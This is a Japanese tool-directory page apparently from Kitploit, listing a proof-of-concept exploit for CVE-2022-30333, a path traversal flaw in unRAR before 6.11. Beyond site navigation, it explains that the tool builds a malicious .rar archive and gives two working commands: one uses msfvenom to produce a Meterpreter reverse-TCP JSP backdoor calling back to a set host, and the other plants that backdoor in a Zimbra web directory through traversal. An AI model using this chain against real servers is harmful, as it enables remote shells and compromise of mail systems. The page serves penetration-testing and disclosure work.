Skip to content
KitploitKITPLOIT
ツールブログ
Log in
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

フィードお問い合わせプライバシー© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
unrar-cve-2022-30333-poc — CVE-2022-30333 の unRAR におけるパストラバーサル脆弱性の概念実証エクスプロイト。悪意のある .rar ファイルを生成し、任意の場所にペイロードを仕込みます。ペネトレーションテストのために Metasploit および msfvenom と連携します。 | Kitploit
ツール/GitHubGitHub/rbowes-r7/unrar-cve-2022-30333-poc
エクスプロイトフレームワークペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubrbowes-r7/unrar-cve-2022-30333-poc

unrar-cve-2022-30333-poc

CVE-2022-30333 の unRAR におけるパストラバーサル脆弱性の概念実証エクスプロイト。悪意のある .rar ファイルを生成し、任意の場所にペイロードを仕込みます。ペネトレーションテストのために Metasploit および msfvenom と連携します。

リポジトリを見る
14584年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2022-30333 の概念実証 - unRAR バージョン 6.11 未満におけるパストラバーサル脆弱性です。AttackerKB の記事向けにエクスプロイトのデモとして作成し、近々 Metasploit モジュールに組み込む予定です。

基本的には、ターゲット(パストラバーサルを含む)とファイルデータを指定すると、そのファイルを指定された場所に展開する .rar ファイルを生成します。最大ファイル長は 104 バイト、最大ファイルサイズは 4096 バイトです。(これは脆弱性に固有の制限ではなく、ファイルを生成する際に私が設定した値です。)

例えば、msfvenom でバックドアを生成します。

$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.0.0.146 -f jsp -o payload.jsp

次に、.jsp ファイルを特定の場所に仕込んだ .rar ファイルを作成します。

$ ruby ./cve-2022-30333.rb '../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/backdoor.jsp' ./payload.jsp > file.rar
ツールをダウンロード